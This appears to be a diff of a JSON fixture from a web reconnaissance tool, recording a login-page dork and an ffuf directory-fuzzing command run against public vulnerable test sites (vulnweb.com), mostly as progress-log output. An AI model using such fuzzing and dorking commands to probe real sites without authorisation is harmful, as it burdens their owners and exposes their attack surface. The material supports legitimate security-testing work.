[1804/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1828/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1835/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1858/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1872/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1889/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1902/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1919/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [1929/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [1947/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [1965/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [1977/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2002/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2007/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2032/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2046/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2056/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2069/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2082/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2092/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2106/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2115/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2134/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2154/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2161/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2181/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2197/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2209/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2225/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2237/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2254/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2269/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MTlhOTE4ZDI=\",\"FUZZ\":\"ZXhhbXBsZXM=\"},\"position\":2258,\"status\":200,\"length\":493,\"words\":87,\"lines\":15,\"content-type\":\"text/html; charset=utf-8\",\"redirectlocation\":\"\",\"url\":\"http://testhtml5.vulnweb.com/examples\",\"duration\":176535919,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testhtml5.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2283/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2284/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2302/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2321/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2338/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2355/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2368/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2385/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2402/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2412/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2431/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2441/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2462/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2480/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2493/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2511/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2528/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2537/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2555/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2568/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2580/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2599/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2607/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2626/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2643/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2659/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2672/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2692/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2702/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2723/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2738/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2753/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2775/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2788/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2806/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2817/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2830/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2841/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2856/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2871/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2887/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2894/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2913/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2922/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2940/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2958/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2968/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2989/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3000/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3012/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3025/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3040/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3047/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3065/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3077/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3094/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3115/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3124/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3149/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3159/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3177/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3192/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3205/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3220/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3240/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3250/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3267/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3287/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3297/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3318/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3330/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3348/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3364/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3377/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3391/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3411/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3419/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3439/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3458/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3469/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3488/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3493/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3513/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3517/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3537/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3549/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3563/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3577/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3595/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3616/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3625/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3651/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3653/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3679/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3687/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3709/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3723/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3728/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3741/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3747/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3765/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3771/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3792/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3798/4842] :: Job [1/1] :: 99 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3820/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3829/4842] :: Job [1/1] :: 101 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3847/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3871/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3880/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3901/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3910/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3931/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3943/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3947/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3957/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3965/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3984/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3992/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4011/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4021/4842] :: Job [1/1] :: 104 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4043/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4051/4842] :: Job [1/1] :: 101 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4073/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4081/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4103/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4114/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4133/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4143/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4165/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4182/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4196/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4215/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4221/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4244/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4254/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4273/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4281/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4300/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4309/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4330/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4348/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4359/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4384/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4391/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4412/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4417/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4439/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4445/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4464/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4470/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4489/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4500/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4519/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4535/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4549/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4579/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4581/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4609/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4619/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4639/4842] :: Job [1/1] :: 150 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4650/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4654/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4665/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4669/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4691/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4695/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4721/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4725/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4751/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4761/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4777/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4799/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4805/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4827/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4833/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 71 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n", + "time": "2024-11-13T02:37:52.661Z" } }, { - "model": "startScan.dork", - "pk": 12, + "model": "startScan.command", + "pk": 111, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/categories.php" + "scan_history": 1, + "activity": 6, + "command": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testphp.vulnweb.com/FUZZ -json", + "return_code": 0, + "output": "\n /'___\\ /'___\\ /'___\\ \n /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \n \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \n \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \n \\/_/ \\/_/ \\/___/ \\/_/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http://testphp.vulnweb.com/FUZZ\n :: Wordlist : FUZZ: /home/rengine/wordlists/fuzz-Bo0oM.txt\n :: Follow redirects : false\n :: Calibration : true\n :: Timeout : 5\n :: Threads : 30\n :: Delay : 0.05 seconds\n :: Matcher : Response status: 200,204\n________________________________________________\n\n\n\u001b[2K:: Progress: [1/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: 